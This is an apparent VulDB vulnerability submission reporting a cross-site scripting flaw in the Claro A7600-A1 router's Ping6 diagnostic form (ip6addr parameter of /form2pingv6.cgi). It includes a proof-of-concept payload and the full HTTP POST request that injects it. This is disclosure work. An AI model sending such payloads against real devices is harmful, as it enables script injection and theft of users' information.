| Titel | Claro A7600-A1 Wlan Router RNR4-A72T-2x16_v2110403_CLA_32_160817 Cross Site Scripting |
|---|
| Beschreibung | In the 'index.htm' file, in the path '/index.htm' an unrestricted Cross-Site Scripting (XSS) vulnerability and injection attacks exist in the "Claro A7600-A1" system, specifically targeting the 'Ping6 Diagnóstico' parameter. The function executes the user-supplied parameter without validation. Malicious attackers can leverage this vulnerability to access sensitive client information.
script: <img/src/onerror=prompt(8)>
Request:
POST /form2pingv6.cgi HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 94
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://xx.xx.xx.xx
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xx.xx.xx.xx/ping_v6.htm?v=1740751210000
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
ip6addr=%3Cimg%2Fsrc%2Fonerror%3Dprompt%288%29%3E+&interface=&submit.htm%3Fpingrlt_v6.htm=Send |
|---|
| Quelle | ⚠️ http://x.x.x.x/index.htm |
|---|
| Benutzer | Havook (UID 71104) |
|---|
| Einreichung | 28.02.2025 15:02 (vor 1 Jahr) |
|---|
| Moderieren | 11.03.2025 07:51 (11 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 299216 [Claro A7600-A1 RNR4-A72T-2x16_v2110403_CLA_32_160817 Ping6 Diagnóstico /form2pingv6.cgi ip6addr Cross Site Scripting] |
|---|
| Punkte | 17 |
|---|